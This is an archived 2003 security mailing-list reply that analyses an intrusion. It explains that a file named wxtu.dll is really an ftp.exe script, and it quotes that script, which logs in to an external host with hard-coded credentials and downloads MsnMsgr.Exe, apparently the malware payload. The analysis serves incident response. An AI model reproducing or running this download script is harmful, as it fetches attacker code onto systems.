Re: New Worm or Worm Variant?

From: Joris De Donder (joris_at_digitaldefense.be)
Date: 12/11/03

Next message: Harlan Carvey: "Re: Strange services.exe file"

Previous message: Nick FitzGerald: "Re: Strange services.exe file"
Maybe in reply to: Charles Hamby: "New Worm or Worm Variant?"
Next in thread: Charles Hamby: "RE: New Worm or Worm Variant?"
Reply: Charles Hamby: "RE: New Worm or Worm Variant?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Thu, 11 Dec 2003 15:22:07 +0100
To: incidents@securityfocus.com

>2) Any theories on wxtu.dll? Since I can't get a hold of the malware to analyze it, I'm really guessing at this
>point.

It is just a text file containing:
  open 211.26.130.118
  USER noxe
  noxe
  binary
  get MsnMsgr.Exe
  bye

>it it appears to be using something like FTPCOM to do a
>non-interactive FTP session

Your attacker (or his script) tries to use the ftp.exe that ships with
Microsoft Windows to retreive MsnMsgr.Exe from an FTP server running
at 211.26.130.118 (in your first capture).

Joris

---------------------------------------------------------------------------
----------------------------------------------------------------------------

Next message: Harlan Carvey: "Re: Strange services.exe file"

Previous message: Nick FitzGerald: "Re: Strange services.exe file"
Maybe in reply to: Charles Hamby: "New Worm or Worm Variant?"
Next in thread: Charles Hamby: "RE: New Worm or Worm Variant?"
Reply: Charles Hamby: "RE: New Worm or Worm Variant?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]